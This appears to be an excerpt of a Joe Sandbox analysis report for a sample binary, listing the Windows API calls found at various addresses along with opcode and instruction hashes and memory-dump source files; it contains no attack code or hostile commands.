                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                  • API String ID: 2574300362-1816364905
                                                                                                                  • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                                                                  • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                                                                                                  • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                                                                  • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                                                  • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                                                                  • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                                                  • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2808897238-0
                                                                                                                  • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                  • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                                  • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                  • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                                                  • __itow.LIBCMT ref: 004699CD
                                                                                                                    • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                                                  • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                                                  • __itow.LIBCMT ref: 00469A97
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$__itow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3379773720-0
                                                                                                                  • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                  • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                                                  • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                  • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                                                  APIs
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3880355969-0
                                                                                                                  • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                  • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                                                  • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                  • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                                                  APIs
                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                                  • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                                  • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1352109105-0
                                                                                                                  • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                  • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                                                  • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                  • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                                                  APIs
                                                                                                                  • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                                  • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3321077145-0
                                                                                                                  • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                  • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                                                  • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                  • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                                                  APIs
                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                                                  • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3058430110-0
                                                                                                                  • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                  • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                                                  • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                  • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(?), ref: 004503C8
                                                                                                                  • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                                  • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                                  • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Proc$Parent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2351499541-0
                                                                                                                  • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                  • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                                                  • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                  • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                                                  APIs
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                                                  • TranslateMessage.USER32(?), ref: 00442B01
                                                                                                                  • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$Peek$DispatchTranslate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1795658109-0
                                                                                                                  • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                  • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                                                  • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                  • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                                                                    • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                    • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                    • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                  • GetCaretPos.USER32(?), ref: 004743B2
                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                                                  • GetForegroundWindow.USER32 ref: 004743EE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2759813231-0
                                                                                                                  • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                  • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                                  • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                  • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                  • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                                                  • _wcslen.LIBCMT ref: 00449519
                                                                                                                  • _wcslen.LIBCMT ref: 00449526
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend_wcslen$_wcspbrk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2886238975-0
                                                                                                                  • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                  • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                                                  • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                  • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __setmode$DebugOutputString_fprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1792727568-0
                                                                                                                  • Opcode ID: 82eaaed52695fbaf4d251d9c6fc514291b8525fa1fa6e6ee5924846bb5fa078f
                                                                                                                  • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                                                  • Opcode Fuzzy Hash: 82eaaed52695fbaf4d251d9c6fc514291b8525fa1fa6e6ee5924846bb5fa078f
                                                                                                                  • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2169480361-0
                                                                                                                  • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                  • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                                  • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                  • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                                    • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                                    • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                  • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
